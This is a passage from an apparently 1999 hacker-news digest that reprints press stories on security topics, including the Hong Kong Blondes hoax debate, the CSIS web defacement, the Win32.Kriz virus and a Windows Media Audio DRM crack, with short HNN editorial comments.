- Volunteer for a project in your area of expertise.

- Network with people.

- Start your own company.

Or sign on to another start-up.

He also advised the crowd to build tools they themselves
would use ("You should be customer No. 1!"), license
technology when appropriate and solve problems with
free software or generate it.

"When building reputation capital, it's pretty important to
learn to think like the boss,'' he said.

In addition to his day job, Del Torto is a member of the
Cypherpunks, a San Francisco-based hacking
organization that produces what he calls
"
no-compromise" security technology.

Del Torto had advice for his Fortune 1000 brethren, too.
Asked if young hackers, who may not be partial to suits
and ties, are discriminated against, Del Torto recalled
that Dan Farmer, author of the widely used Satan
network scanning tool, was once turned down by a
prospective employer who found his appearance
unsettling. He urged IT managers to avoid superficial
judgments and focus on the reputation of the individual.
IT managers interviewing young people who "
act
differently" should remember when they were young, he
advised.

Del Torto noted that in the relatively small community of
IT security professionals, people are preceded by their
reputations. He said he knows programmers who are
talented, but he won't hire or recommend them because
they don't act responsibly.

@HWA


39.0 SETI@Home, Largest Computation Ever
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/


contributed by Space Rogue
With over 1 million users, and 50,000 years of
accumulated computer time the SETI@Home project is
now the largest computation ever. SETI@Home is a
distributed computing project that analyzes radio signals
for signs of alien life. The HNN SETI@Home Team is still
going strong.

BBC
http://news.bbc.co.uk/hi/english/sci/tech/newsid_423000/423022.stm

HNN SETI@Home Team
http://setiathome.ssl.berkeley.edu/stats/team/team_2251.html



Tuesday, August 17, 1999 Published at 18:11 GMT 19:11 UK


Sci/Tech

Alien hunter breaks record

The massive Arecibo telescope is collecting the data

By BBC News Online Science Editor Dr David
Whitehouse

The SETI@home screensaver project, which allows
anyone with a desktop computer to join the search for
intelligent life in space, is now the largest computation
ever done, on Earth at least.

Since May, over a million people have downloaded the
SETI@home screensaver. But, despite an accumulated
50,000 years of computer time, no signs of alien life have
yet been found.


The SETI@home program
has infiltrated homes, offices
and classrooms in 223
countries, "
It is truly a
phenomenon," said
SETI@home project director
David Anderson. "
One person
runs it in an office and pretty
soon the whole office is doing
it."

Companies large and small
(including the BBC) as well as schools and universities
have formed groups to compete to see whose computers
can analyse the most chunks of data.

The program acts like a screen saver, starting when the
computer is idle and analysing data collected from the
Arecibo radio telescope in Puerto Rico.


The analysis is done
automatically and the results
are sent back to the
University of California at
Berkeley, while participants
can see the progress on the
computer screen.

Number cruncher

According to Professor
Anderson it proves the value
of distributed computing and
it has encouraged him to
look around for other projects that could benefit from this
technique.

"
SETI@home is now the largest computation ever done
on this planet, we have accumulated more than 50,000
years of computing time so far," said project scientist
Dan Werthimer, a research physicist at the University of
California Berkeley's Space Sciences Laboratory.

"
This also is the most sensitive sky survey ever
conducted," Professor Werthimer added. SETI@home is
so powerful because we are using the world's largest
telescope and we are able to use it continuously, 24
hours a day, by piggybacking on other observations."


Of the million people who have downloaded the software
about 600,000 have completed at least one unit of data
analysis.

Analysts say that the backlog of data from the Arecibo
telescope is rapidly disappearing, and Professor
Anderson and his team are currently updating the
software to analyse the data again to search for more
complex signals.

@HWA

40.0 Hong Kong Blondes Labeled a Fraud
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Simple.Nomad
An article in Computer currents has labeled the Hong
Kong Blondes as a hoax. The HKBs are a deep
underground group who work to disrupt Chinese
computer systems from the inside. This article claims
that because he can't find any evidence to support
their existence they must be fake. Maybe they are just
really good at hiding. That is, after all, what it means to
be underground. Last year the Cult of the Dead Cow
formed a relationship with the group to help train them
on encryption and intrusion techniques. Last December
the cDc issued a press release claiming that their
training had been successful and that their relationship
would now end. Just because the reporter who wrote
this article can find no evidence of their existence
probably means he didn't look too hard.

Computer Currents
http://www.currents.net/newstoday/99/08/18/news3.html

Late Update
In a recent conversation with HNN Reid Fleming a cDc
cultee said "An absence of evidence does not equal
evidence of absence."



The Hacker Hoax
By Neil Taylor, IT Daily.
August 18, 1999

The world's press might have been fooled into believing that
a Chinese hacker group plans to bring down the country's
information infrastructure. According to stories that began
circulating in July last year, the rogue group, the Hong Kong
Blondes, is made up of dissidents both overseas and within
the Chinese Government.

The rumours began when an interview with the group's
leader was published by US hacking group the Cult of the
Dead Cow (CDC) at http://www.cultdeadcow.com . In the
interview, illusive Hong Kong Blondes director Blondie
Wong said that he had formed an organization named the
Yellow Pages, which would use information warfare to
attack China's information infrastructure.

The group threatened to attack both Chinese state
organizations and Western companies investing in the
country. For their part, the CDC claimed that they would
train the Hong Kong Blondes in encryption and intrusion
techniques.

One year after the group's supposed launch, there is no
evidence that the Hong Kong Blondes ever existed. In fact,
all evidence appears to indicate that the Hong Kong Blondes
report was a highly successful hoax.

The story was first reported in Wired magazine, and during
the past year has been followed up by numerous publications
including USNews, the Los Angeles Times, Asiaweek and
ComputerWorld. In every case, the original source was the
CDC's July interview.

The CDC is best known for its remote administration tool
Back Orifice. BO can be installed on a Windows PC without
the user's knowledge, giving full control over the machine to
unauthorized third parties.

The first version of Back Orifice was released a month after
the Blondes story was leaked to Wired magazine.

Repeated attempts to contact the CDC failed to elicit a
response, and despite inquiries throughout the Hong Kong
technology and security industries, not one person contacted
had ever come across any evidence of the group's existence.

The Hong Kong Police, which is responsible for tracking
hacking activities locally, had no knowledge of the group.
Detective senior inspector Martyn Purbrick, of the
Commercial Crime Bureau's Computer Crime Section, said
that there had been no official reports of the group's
activities. He added that he only knew the group's name
through reports in the media.

Stephen Mak, principal assistant secretary of the information
technology and broadcasting bureau, said, "We have carried
out inquiries both within the government as well as with the
ISPA, but we could find no information about the group."


Samuel Chanson, director of the Cyberspace Centre at the
Hong Kong University of Science and Technology, said the
threats would take no great skill to carry out. "Hacking into
almost any major server is do-able with some training."


Chanson said that a group of his undergraduate students
took a two-day course in intrusion techniques, after which
they were able to break into several hundred servers in
campus tests. "We checked how good their network security
was and succeeded in bringing down a go

  
od number of their
servers as well as gaining important information... Attacking
the general commercial server is not a difficult task."

Early this year, a US hacker group, the Legion of the
Underground (LoU) at http://www.legions.org , launched a
declaration of infowar on China, in response to the harsh
penalties handed out for computer offenses in the country.
LoU members cited the Hong Kong Blondes as an influence
behind their short-lived war, which was abandoned following
condemnation from other hacker groups. However, a large
number of Chinese Web sites were hacked by protesters,
including Hongkong.com, China Window, Wenjin Software
and the semi-official China Society for Human Rights
Studies.

CDC remains tight-lipped on the issue. But publishers might
do well to remember a statement made by the group in its
Media Domination Global Update: "We intend to dominate
and subvert the media wherever possible."

@HWA

41.0 Peace Prize Winner Warns of Cyber War
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Lionel
Jose Ramos Horta, a Nobel laureate, has warned that if
fraud is detected in the August 30th balloting in the
vote for East Timor's independence then cyber war will
result. The Timor resistance leader has warned that a
dozen viruses were being designed by over 100 people
in Europe and North America to infect computers if there
is fraud detected. (While these claims may be true it
reeks of sensationalism and headline grabbing. With no
evidence to support these claims we remain doubtful.)

BBC
http://news.bbc.co.uk/hi/english/world/asia-pacific/newsid_423000/423549.stm



Wednesday, August 18, 1999 Published at 13:45 GMT 14:45 UK


World: Asia-Pacific

Timor activists warn of
cyber war

Gunmen shot at the offices of the main independence group on
Tuesday


Computer hackers plan to sabotage
Indonesia's banking system if Jakarta
rejects an East Timor vote for
independence, resistance leader Jose
Ramos Horta has warned.

Mr Horta said
about a dozen
viruses were
being designed to
infect computers
if there is fraud in
the 30 August
ballot on the territory's future.

The Nobel laureate warned that a 100-strong team of
hackers in Europe and North America had prepared a
campaign that would cause economic devastation to
Indonesia.


Their targets would include
computers controlling
banking, finance, the military
and aviation, he said in a
commentary in Australia's
Sydney Morning Herald.

"One computer wizard
recently told me, 'We will
terminate their banking
system. We will invade their
sites and destroy them...We
will cause them to lose
hundreds of millions of
dollars'," he added.

Electoral fraud

The warnings come as East Timor prepares to choose
between Jakarta's offer of autonomy or full
independence.


The United Nations which is
overseeing the ballot says it is
confident there will be a free and fair
vote.

But Mr Horta has warned that the
ballot could turn into the biggest
electoral fraud in modern times.

He said Indonesia's army intended to get a
pro-integration vote through by terror and fraud.

Mr Horta alleged that a violent campaign by pro-Jakarta
militias had already

cost over 1,000 lives

razed entire villages

uprooted 80,000 people

He said the vote was also compormised by

a ban on detained resistance leader Xanana
Gusmao and himself during the campaigning

continued Indonesian army support for the militias

a biased Indonesian controlled East Timorese
media

"All this makes for an extremely dangerous situation.
Full-scale violence before or after the ballot is now
almost certain," Mr Horta added.


''The next phase of
resistance will be much more
desperate and ferocious and
will not be contained to East
Timor," he added.

Mr Horta's comments came
as Amnesty International
also warned that Indonesia's
failure to halt the bloodshed
in East Timor - mainly by
pro-Jakarta militias -
threatened to prevent a fair
ballot.

Indonesia invaded East Timor, a former Portuguese
colony, in 1975 and annexed it the following year in a
move not recognised by the UN.

Human rights groups say more than 200,000 people
died, many of them from starvation, in the years since
the invasion.

@HWA

42.0 Mitnick Still Denied Kosher Food
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by TurTleX
In continuing violation of Constitutional Law, Kevin
Mitnick is still being denied the ability to practice his
religion by not being served kosher foods. A rabbi for
the San Bernardino County Detention Center has
confirmed that the center does not provide kosher
meals. Kevin has started eating the vegetarian meals
provided by the prison as an alternative, even though
they are not kosher.

Wired
http://www.wired.com/news/news/politics/story/21322.html

Life Not Kosher for Mitnick
by Douglas Thomas

12:15 p.m. 18.Aug.99.PDT
Jailed computer hacker Kevin Mitnick wants out of his current facility because it doesn't serve kosher food.

Mitnick wouldn't eat for the first two days of his stay at the San Bernardino County Detention Center after being transferred there from the Los
Angeles Metropolitan Detention Center.


He only recently began eating the jail's vegetarian meals, which it offers as a substitute. But those meals don't meet rabbinical standards.

Mitnick insists that maintaining a kosher diet is extremely important to him.

"This is a violation of my constitutional rights," Mitnick said. "I'm being forced into a situation where I have to violate my religious beliefs or starve."

Complicating the move, Mitnick said, is that his MDC-stored money won't be available for several weeks, making it impossible for him to buy
commissary food. In addition, he said, prices are triple what they were at the old facility.

Mitnick's rabbi, Aaron Kriegal, and the rabbi for the San Bernardino County Detention Center, Hillel Cohn, confirmed that the SBCDC does not serve
kosher meals to Jewish inmates.

"Does it make life more difficult? Yes," Cohn said. "But being in prison is difficult. It wasn't meant to be a country club. There are some sacrifices
inmates have to make."

Cohn said returning Mitnick to Los Angeles would "make life easier" for Mitnick, but did not believe that the move was likely.

"This is not the first request we've had to have an inmate transferred for this reason," Cohn said.

At sentencing, Mitnick's attorney failed to persuade US District Judge Marianne Pfaelzer that Mitnick serve his time at the MDC to ensure his access
to kosher meals.

Currently, Mitnick shares one large cell with approximately 60 other inmates, each of whom is issued a small mattress, sheet, and blanket. The cell
contains one toilet and one shower, each in open view of the cell.

Mitnick calls the conditions "dehumanizing."

Mitnick is expected to spend four to six weeks at the San Bernardino facility while awaiting final designation, most likely to Nellis Prison Camp just
outside of Las Vegas.

Mitnick's attorneys have filed a motion with the court requesting that he be transferred back to the MDC until the Bureau of Prisons decides where
he will serve the remainder of his 46-month prison sentence.

Because of previous time served, Mitnick is expected to be released in January 2000.

@HWA

43.0 Cable Pirates Busted
~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/


contributed by skeletor and deepquest
MediaOne, the largest cable provider in Massachusetts,
recently performed an audit of 162,000 non-customer
homes and found that over 23,000 where receiving
cable illegally. MediaOne has decided not to press
charges but instead has disconnected the freeloaders.
MediaOne has hired contractors to go street by street
to check whether non customers are receiving cable TV
service. These audits are preformed from outside the
homes.

Boston Globe
http://www.boston.com/dailyglobe2/230/metro/many_get_cable_TV_for_free_audit_finds+.shtml

A raid conducted on Wednesday by MediaOne officials
and the Moreno Valley Police Department has uncovered
more than a million dollars' worth of "black boxes," the
descrambling device that enables users to illegally
access cable-TV channels. All equipment, including
shipping and billing information from Cable Converter
Concepts and Hi-Tech Converter Labs was confiscated.

Andover News
http://www.andovernews.com/cgi-bin/news_story.pl?28463/topstories

Boston Globe;

THIS STORY HAS BEEN FORMATTED FOR EASY PRINTING


many get cable TV for free, audit finds

MediaOne pulls plug on thousands

By Bruce Mohl, Globe Staff, 08/18/99

In a street-by-street survey in Eastern Massachusetts, the state's largest cable television
company is finding that thousands of people are getting cable but not paying for it.

Of 162,000 non-customer homes or apartments checked so far by MediaOne, 14 percent, or
nearly 23,000, were receiving an unauthorized cable TV signal. In most cases, the signal was either
stolen or left on inadvertently by MediaOne.

MediaOne is not taking the freeloaders to court or demanding back payment. Instead, the company
is disconnecting the unauthorized service and politely urging the consumer to start paying for it. So
far, about 16 percent have done so.

''It's an amnesty kind of deal,'' said John Fouhy, director of security for MediaOne in the Northeast.
''We don't consider it stealing or illegal. It's just not in our billing system.''

Fouhy declined to identify where the problem is most severe, saying he did not want to cast
aspersions on any particular community. But he said it is more pronounced in urban areas with
apartment buildings where people tend to move in and out a lot. MediaOne serves most of Eastern
Massachusetts except for Boston, Brookline, and Braintree.

''Leafy suburbs tend to have lower unauthorized rates,'' Fouhy said.

At a time when MediaOne is rapidly building a sophisticated network to carry high-speed Internet
access and local phone service in addition to cable TV, the fact that thousands of people are getting
cable for free cannot do the company's high-tech image any good.

But Fouhy said he was not surprised by the numbers, given what companies in other parts of the
country have found with similar audits. He said that some people are stealing the signal and in other
cases are just taking advantage of MediaOne's failure to shut previous service off.

He gave the example of someone in Cambridge who is paying for cable TV and moves out of the
apartment. Rather than send a technician to the apartment to shut service off, Fouhy said,
MediaOne and the companies it has acquired in recent years often leave service on for the tenant
moving in. That way service can start immediately with little or no installation cost for both the
consumer and the company.

''In most instances, people understand cable doesn't come with the house,'' Fouhy said.

But apparently all too often the new tenant would just plug his cable wire into his TV set or
videocassette recorder and start watching CNN.

Fouhy said the survey began in March and is scheduled to end in October and then resume again
next year. It has focused mostly on communities where ''churn'' - turn-ons and turn-offs of cable
service - is high or where cable penetration seems unusually low. In those communities, Fouhy said,
MediaOne has hired contractors to go street by street to check whether noncustomers are
receiving cable TV service. Fouhy said the surveyors do not go inside homes.

The MediaOne survey is not designed to track down people who are using black boxes to illegally
pirate premium cable channels, a problem that Fouhy described as ''significant.'' Industrywide, he
said, cable companies are losing more than $5 billion a year in pirated premium and pay-per-view
channels. MediaOne officials declined to comment on what tactics they are using to eliminate this
fraud.

In such an extensive audit, accidents apparently happen. Susanna Joannidis of Cambridge, who
owns a single-family home and is up-to-date on her monthly MediaOne bill, said she and a
neighbor lost their cable service early last month. It took almost two days to figure out that a
technician had shut off the wrong service, causing Joannidis to miss the finals of Wimbledon that she
had been eagerly anticipating.

Joannidis said she thought it was strange that MediaOne does not know who its customers are.
MediaOne sent Joannidis a letter of apology and gave her a $110 credit.

This story ran on page A01 of the Boston Globe on 08/18/99.
© Copyright 1999 Globe Newspaper Company.

-=-


MediaOne Sting Operation Nabs
Web-Based Cable Pirates; Moreno Valley
Police Department Raid Nets More Than
$1 Million in Illegal Equipment

EL SEGUNDO, Calif., Aug 18, 1999 (BUSINESS WIRE
via COMTEX) -- OnWednesday, MediaOne(R) and the
Moreno Valley Police Department executed three
early-morning search warrants, raiding private homes in
Riverside County, Calif., and uncovering evidence of a
multimillion-dollar national cable-piracy operation that
had been conducted over the Internet.

The raid netted more than a million dollars' worth of
"black boxes," the descrambling device that enables
users to illegally access cable-TV channels, as well as
master computer chips that could be cloned for new
black boxes, and shipping and billing evidence.

Charles Balan, 28 years old, of Romoland, Calif., and
Brian Fulk, 24 years old, of Moreno Valley, were
arrested and are facing felony charges. A third suspect
is still at large. The extensive computer equipment from
their operations, called Cable Converter Concepts and
Hi-Tech Converter Labs, was confiscated, and their
Web sites were shut down.

Theft of service is one of the biggest problems faced by
cable companies today. It is estimated that this
criminal activity costs the industry and its customers
more than $5.8 billion annually. Not only is this cost
passed on to honest customers, but the quality of their
service is also diluted by the illegal hardware.

Cities themselves also lose millions in franchise fees --
the monthly, subscriber-based revenues paid to them
by cable-TV companies.

"The success of today's operation is a perfect example
of what occurs when you have a cooperative effort
between private industry and law enforcement," said
Sgt. Joseph Cleary, supervisor in charge of the
search-warrant execution.

"We're getting the message out that we won't tolerate
this kind of criminal activity," said Mike Bates, director
of security for MediaOne. "Abuse of e-commerce via
the Internet is a nationwide problem that affects cities,
companies and private citizens alike."

MediaOne Group (NYSE:UMG) is one of the world's
largest broadband-communications companies,
bringing the power of broadband and the Internet to
customers in the United States, Europe and Asia. The
company also has interests in some of the
fastest-growing wireless-communications businesses
outside the United States.

For 1998, the businesses that constitute MediaOne
Group produced $7.1 billion in proportionate revenue.
On May 6, 1999, the company entered into an
agreement to merge with AT&T.

Copyright (C) 1999 Business Wire. All rights reserved.

@HWA

44.0 CSIS Admits Web Defacement
~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/


contributed by deepquest
The Canadian Security Intelligence Service has admitted
that its web page had been defaced back in 1996. The
spy agency admitted that its web page had been
changed to read "Canadian Security Illegal Service".
CSIS admitted what had occurred in a recent paper
released by the agency that discuss cyber warfare.

Globe Technology
http://www.globetechnology.com/archive/gam/News/19990818/UTERRN.html

Andover News
http://www.andovernews.com/cgi-bin/news_story.pl?28513/topstories



Hackers altered its Web page, CSIS reports
Terrorists could cripple societies, start wars
by invading cyberspace, spy agency warns

JEFF SALLOT
Parliamentary Bureau
Wednesday, August 18, 1999

Ottawa -- Computer hackers altered the logo on the Canadian Security Intelligence Service's Web page to
read "Canadian Security Illegal Service" within days of the site going up on the Internet, the spy agency says.

This act of cyberspace vandalism was quickly cleaned up, and there is no evidence the hackers ever got into
the agency's top-secret internal computer network, CSIS says.

But the incident is a warning about how hackers can manipulate data from long distances, CSIS says in a new
background paper describing trends in international terrorism and warning that cyberattacks might cripple
modern societies.

The background paper was released yesterday and is the service's first public disclosure of the 1996 incident
involving its own Web page.

CSIS spokesman Dan Lambert said the Web sites of several other federal government departments were also
hit at about the same time.

An investigation was conducted, but CSIS will not disclose the results.

The background paper warns that as modern countries become increasingly dependent on computer-based
communication, "future wars could involve cyberattacks on information infrastructure."

Canada is particularly vulnerable because of its heavy reliance on these advanced technologies.

"If teenagers can compromise networks using basic skills and tools available on the Internet, the concern is
what can be accomplished by terrorist groups or states with far greater resources and motivation," the paper
says.

The paper says that the Web site of the Irish Republican Army openly discusses ways it could use so-called
information operations to attack British interests.

A support group for Tamil terrorists took responsibility for attacking the E-mail system of Sri Lankan
diplomatic missions in Washington and New York two years ago.

"On the World Wide Web, distance is not a factor. . . . We are as vulnerable as any other country and have
more assets at risk than most," the paper says.

CSIS, like other sensitive government agencies, almost certainly protects its secret computer systems by
physically segregating them from any connection to the Internet, commented Peter Davis, a computer-security
consultant.

Mr. Davis said that terrorist attacks in cyberspace are going to become more frequent as groups become
more sophisticated in the use of technology.

Even some of the most sophisticated military communications systems appear to be vulnerable. Military
sources have said the Canadian Forces lost key computer links with 10 military allies for 24 hours during a
simulated cyberterrorist attack last year.

A Canadian team working in Britain penetrated military networks as far away as Australia.

-=-

Canadian Security Agency Warns Against
Cyber-Attack

OTTAWA, ONTARIO, CANADA, 1999 AUG 18
(Newsbytes) -- By Martin Stone, Newsbytes. Canada'a
central security agency, the Canadian Security
Intelligence Service (CSIS) has issued a warning
against global terrorism, citing hackers and crackers,
those who penetrate secure computer systems, as a
growing threat.

In a background paper released Thursday, CSIS admits
that crackers entered their Website in 1996 and altered
their logo by changing the word "Intelligence" to
"Illegal." In this first public disclosure of the incident,
the agency says the damage was quickly discovered
and corrected, but the event serves as an example of
how cyber-savvy terrorists may be able to tamper with
mission-critical systems.

The paper gives a brief outline of terrorist activities of
the past and suggests that insurgents could severely
cripple societies and even start wars by invading and
taking control of the critical computer components.

The CSIS site was cracked within days of its having
gone live, but the agency says there is no evidence
that any sensitive files were entered.

CSIS spokesman Dan Lambert told Newsbytes that the
site is in the public domain and is in no way connected
to other CSIS computer systems, adding that the
server is not even located on the CSIS premises, but
housed at Canada's Department of Public Works.

He said the Websites of several other federal
government departments were also invaded at about
the same time. Since then, there have been several
instances of federal and provincial government
Websites being cracked, however no serious outages
or security breaches have occurred.

The study hints that, as modern civilizations become
more dependent on computers and connectivity, future
wars could be fought in cyberspace.

Canada is known to be particularly vulnerable due to a
heavy reliance on advanced technologies, as has been
reported recently by Newsbytes and other media.

The backgrounder says: "If teenagers can compromise
networks using basic skills and tools available on the
Internet, the concern is what can be accomplished by
terrorist groups or states with far greater resources and
motivation."

The paper also states: "Terrorist methods continue to
become more sophisticated, both in terms of
technology and the exploitation of public opinion and
media channels. Globally mobile and knowledgeable
about communications, explosives technology and
computers, they have contacts around the world. Their
activities and targets are difficult to predict. The use of
technology, always part of the terrorist arsenal, has
been augmented by encryption and the Internet to
facilitate communication and reach a wider audience.

"In addition, the growing dependence of states on
computer-based communication and technologies is
leading to a world in which future conflicts could involve
activities in cyberspace and attacks on a state's
information infrastructure, now commonly referred to as
information operations. As one of the world's most
advanced states in its reliance on information
technologies, Canada is concerned about its
vulnerability to this threat.

"We are already seeing indicators of the changing
threat environment in this area. One of the IRA
Websites openly discusses ways it could use
information operations to attack British interests. In the
summer of 1997, a group linked to the Liberation Tigers
of Tamil Eelam claimed responsibility for an attack on
the e-mail systems of the Sri Lankan Embassy in
Washington and its Mission in New York.

"If a Website is successfully hacked into, data on the
site can be manipulated. As an example, the CSIS
Website was hacked into and a few words changed on
the home page. On the World Wide Web, distance is
not a factor. Canada's geographic location and the
world's longest undefended physical border provide no
natural protection against these kinds of attacks. We
are as vulnerable as any other country and have more
assets at risk than most."

Analysts suspect that cyber-terrorist attacks will
become more frequent as groups grow more
sophisticated in the use of technology.

The full text of the backgrounder can be found at
http://www.csis-scrs.gc.ca

@HWA

45.0 Win32.Kriz Set To Go Off Christmas Day
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/


contributed by AlienPlague
A new virus set to hit on Christmas day could be more
devastating than the CIH virus. The virus, which has
been described as being "very well written", kills the
CMOS memory, overwrites data on all available drives,
and destroys the flash BIOS using the same method the
Chernobyl virus used. Luckily, computer users will have
until December 25 to buy or update their anti-virus
software. The virus only infects users of Microsoft
Windows.

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2316716,00.html?chkpt=hpqs014

--------------------------------------------------------------
This story was printed from ZDNN,
located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------

'Christmas' virus can destroy PCs
By Bob Sullivan, MSNBC
August 18, 1999 3:00 PM PT
URL:

A nasty new virus discovered by researchers promises to do even more damage to victims than
the Chernobyl virus. It has the ability not only to erase files, but also to render a PC useless by
destroying its flash BIOS.

The good news is it won't execute until Dec. 25; the bad news is PC users without anti-virus
programs may have a very bad Christmas Day.

The author of Win32.Kriz, discovered recently by researchers, sounds as if he or she has an ax to
grind against religious folks.

Inside the virus is a text string with a poem full of expletives criticizing
those who preach religion: "I don't wanna hear it, coz I know none of
it's true," the author writes, according to anti-virus research firm
Kaspersky Lab.

Victims of the virus -- who can be anyone using Windows 95,
Windows 98 or Windows NT -- can expect a load of trouble. The virus kills the CMOS memory,
overwrites data in all files on all available drives, and then destroys the flash BIOS by using the
same routine that was found in the "Win95_CIH" virus, also known as Chernobyl.

"This is a nasty one, very well written," said Dan Takata of anti-virus vendor Data Fellows Inc.

He said it's too early to tell if the virus will be widespread -- but potential victims have until Dec.
25 to update their antivirus programs against it.

@HWA

46.0 MS Windows Media Audio Broke One Day After Release
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by darktide
Microsoft recently released Windows Media Audio, a
audio format set to compete against MP3. The
difference is the WMA has security features built in to
force people to pay for the music they listen to. One
day after the release of this format cracking programs
like unfuck.exe and AudioJacker where available to
defeat this technology. Microsoft is working on a fix.

C|Net
http://www.news.com/News/Item/0,4,40672,00.html?st.ne.fd.gif.f

Windows Media hits sour note
By Jim Hu and Michael Kanellos
Staff Writers, CNET News.com
August 18, 1999, 4:45 p.m. PT

A day after Microsoft released its new Web music technology, the company confirmed that crackers have already
developed a program to strip away the security behind it.

Microsoft acknowledged that the executable file, dubbed "unfuck.exe," exists and works. In fact, there are a number of programs,
such as Audiojacker, that perform similar functions.

"This one just has a glitzier name," said a Microsoft spokesman, adding that the company is working on a fix.

Normally, only the user who downloads and pays for a song encrypted in Microsoft's Windows Media Audio 4 technology can
listen to it. But with the new exploit, someone who pays for the song also can email it to friends who
want to hear or copy it.

The program works by rerecording musical tracks in an unprotected format. To take advantage of the
program, a would-be pirate has to buy and download music. During the downloading process, the
executable intercepts the music and reformats it into a different format that doesn't have embedded
security elements. Copies can then be made freely.

Windows Media Audio is Microsoft's answer to the numerous audio compression formats that have
gained popularity in the last year. These technologies allow users to download music off the Web
and play it back. MP3 is one technology that has gained considerable popularity.

Although piracy is theft and represents lost potential revenue, observers say the record industry has
historically overplayed the threat. Pirated copies of software or music, especially among hobbyists,
will always crop up. Recently the Recording Industry Association of America, which represents the
major U.S. record companies, has acknowledged this publicly.

"We'll always have piracy of cassettes and CDs, for instance, with the flea markets or street vendors. That will never go away, and
I think the same will be true of the Internet," Hilary Rosen, chief executive of the RIAA, said in an earlier interview. "But we're
going to see an explosion of legitimate music online. And consumers are going to have an alternative. I believe consumers will
want the alternative."

Some analysts agree that consumers tend to gravitate toward buying legitimate copies.

"The piracy threat is a bit overblown at the present time," said Mark Hardie, senior analyst at Forrester Research. "There will be
levels of piracy that will be unavoidable...You will always have code somewhere in cyberspace that will hack through encryption."

He added that it is easier to trace the source of pirated copies of digital music than copies made from traditional methods of
recording. That means it likely will be easier to stop illegal copying in the future than it is today, he said.

Windows Media is a group of technologies for multimedia playback. Besides Windows Media Audio, the package includes
Windows Media Player and software and services including Windows Media Services, Windows Media Tools, and a software
development package.

The Windows Media Audio exploit was first reported on the pro-MP3 Dimension Music site.

@HWA

47.0 Available Soon, Freedom!
~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by jordan
Zero-Knowledge Systems, the Montreal-based start-up,
is set to release Freedom, which is a comprehensive
Internet privacy package that offers multiple online
pseudonyms and Byzantine encrypted rerouting that
even Zero-Knowledge couldn't crack if it wanted to.
Freedom 1.0 for Windows is set for release in late
October or early November.

CNN
http://www.cnn.com/TECH/computing/9908/18/freedom/index.html
Zero Knowledge Systems
http://www.zks.net/clickthrough/click.asp?partner_id=542

Total digital privacy may be on the horizon

August 18, 1999
Web posted at: 5:32 p.m. EDT (2132 GMT)


By Robin Lloyd
CNN Interactive Senior Writer

(CNN) -- If American software
developers were to touch any of the
code in the 10,000 released beta
versions of an Internet privacy
solution that is getting good
preliminary marks, they would be
subject to prosecution.

In fact, if Zero-Knowledge Systems
were based in the United States, it
would be illegal for the company to
export its Internet privacy software,
dubbed 'Freedom.'

Instead, the Montreal-based start-up,
headed up by 26-year-old Austin Hill, is set to release the first product of its
kind -- a comprehensive Internet privacy package that offers multiple online
pseudonyms and Byzantine encrypted rerouting that even Zero-Knowledge
couldn't crack if it wanted to.

No more cookies, e-mail trails and digital identity stealing. At least, that's the
idea. More than a dozen "cookie killers" already exist, along with several
e-mail and browser anonymity services such as anonymizer.com.

Those all rely on what Hill calls a "trust-me" mechanism. A third party server
holds users' identity and data. Freedom makes it so the end-user has sole
possession of that data.

"If there was a gun to my head, I still could not reveal or break the privacy
of my users," Hill says.

The user has the only "key" to their pseudonyms, which can be linked to
independent e-mail addresses, geographic locations and encryption keys.

Freedom is designed to protect the e-mail, chats, browsing and newsgroup
searches of anyone from a Chinese dissident posting pro-democracy
messages to an employee checking out listings for Alcoholics Anonymous.

The software can encrypt private chats and newsgroup discussions, ensures
anonymous Web browsing and can even block spam, Hill says. Each digital
identity relies on full strength encryption that ranges from 128 to 4,096 bits.

Freedom 1.0, which works only on Windows platforms, is set for release in
late October or early November. It will be downloadable for $49.95.
Macintosh and Linux versions are due out next year. Freedom doesn't work
with America Online, however, since AOL is an online service separate from
the Internet.

Zero-Knowledge released 1,000 beta copies of Freedom at the DefCon 7
convention in Las Vegas last month. Since then, it has released thousands
more via its Web site. A total of 50,000 people have requested copies since
then.

How it works

Web users leave traces of their identity behind every time they visit a Web
site or send e-mail. To get a sense of the process, visit the Center for
Democracy and Technology's site and use its demo.

Freedom allows users to set up separate pseudonyms for different aspects
of their lives -- an identity for an online chat about health care, another for
interactions with friends and family, others for Internet browsing and finally a
'true' identity for e-commerce.

Zero-Knowledge is working on an e-commerce identity protection solution
for future versions.

Freedom scrambles data coming from a user's PC and hides the source and
destination of Internet traffic routed through the service.

The message or data packet is first sent to Zero-Knowledge's servers where
it is wrapped in a layer of encryption.

That initiates a delivery process where the data bounces from one
independently owned relay station to the next and can only be opened by
one specific user who then forwards it to another specific user, with that
process repeating several times.

Eventually a data packet goes to its intended target but neither snoopers, nor
the final recipient, have any way of tracing its origins.

Third-party protections, the approach relied upon by Freedom's
predecessors, can be hacked or bought away when the company makes a
new acquisition, as was the case when Double Click acquired Abacus, Hill
said. Or, civil lawsuits can force ISPs to turn over their records.

Freedom gets high marks

David Sobel, general counsel for the Electronic Privacy Information Center,
and Ari Schwartz, a policy analyst with the Center for Democracy and
Technology, agree that Freedom is a good solution.

"I suspect that it is one of the best solutions that we've seen," Sobel said.
Freedom's strength comes from Hill's philosophical commitment to
preserving privacy and anonymity on the Internet, Sobel said.

Schwartz underlined the Center's stance on Internet privacy -- software
solutions combined with self-regulation among service providers and
legislation will be needed to protect privacy online.

The U.S. Congress has introduced several bills this session relating to online
privacy but advocates say they may not go far enough.

A CDT report concludes that online privacy is the exception, not the rule, in
the private sector.

U.S. encryption policy has its pros and cons

The U.S. policy that prohibits encryption exports and labor is based on
protecting security codes produced and cracked by the FBI and other
national security agencies.

